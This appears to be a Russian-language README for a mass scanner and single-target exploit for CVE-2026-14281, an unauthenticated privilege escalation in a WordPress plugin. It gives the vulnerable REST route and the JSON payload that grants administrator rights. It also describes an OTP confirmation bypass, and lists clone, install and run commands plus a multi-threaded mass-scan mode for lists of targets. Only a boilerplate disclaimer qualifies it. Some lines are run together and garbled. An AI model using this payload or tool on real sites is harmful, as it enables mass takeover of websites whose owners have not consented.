
Массовый сканер и эксплойт для одиночной цели для CVE-2026-14281 — неаутентифицированного повышения привилегий в плагине WordPress Automation Web Platform через REST-регистрацию.
Массовый сканер + эксплойт для одиночной цели для CVE-2026-14281 — неаутентифицированное повышение привилегий в плагине WordPress Automation Web Platform (WAWP)
<= 4.8.6.
Неправильное управление привилегиями (CWE-269) в плагине WordPress Automation Web Platform (от 101gen). Уязвимы версии <= 4.8.6.
| Поле | Значение |
|---|---|
| CVE | CVE-2026-14281 |
| Тип | Неаутентифицированное повышение привилегий |
| CVSS | 9.8 (КРИТИЧЕСКИЙ) |
| Аутентификация | Не требуется |
| Затронуто | Плагин WAWP <= 4.8.6 |
Плагин предоставляет публичный REST-маршрут:
POST /wp-json/wawp/v1/signup/<op>
Проверка прав отсутствует. Обработчик копирует контролируемые атакующим wawp_custom_fields в update_user_meta() — без белого списка. Атакующий задаёт:
{
"wawp_custom_fields": {
"wp_capabilities": {"administrator": true},
"wp_user_level": "10"
}
}
Результат: новая учётная запись получает роль administrator.
Токен OTP (otp_transient) возвращается в открытом виде в теле ответа. GET-запрос с этим токеном помечает его как подтверждённый — без необходимости в email/SMS.
/wp-json/wawp/v1/signup/ с wp_capabilities: administrator/wp-login.php с новыми учётными данными/wp-admin/users.php3.7+requests, urllib3git clone https://github.com/yourname/langz-scanner.git
cd langz-scanner
pip install requests urllib3
python3 CVE-2026-14281.py
[1] Mass Scan -> detect many targets, save vuln to txt
[2] Verify Single -> exploit + confirm + auto cleanup
[0] Exit
Mass Scan: файл со списком целей на входе, файл вывода (по умолчанию vuln.txt), число потоков (по умолчанию 20).
Verify Single: введите YA, укажите URL цели. Инструмент создаёт временного администратора, проверяет и затем удаляет его.
vuln.txt содержит только подтверждённые уязвимые URL, по одному в строке:
http://target1.com
https://target2.org
4.8.6/wp-json/wawp/v1/signup/For AUTHORIZED SECURITY TESTING only.
Do not use against systems you don't own or have permission to test.
The developer assumes no responsibility for misuse.
Используйте с умом. Знания предназначены для защиты, а не для разрушения.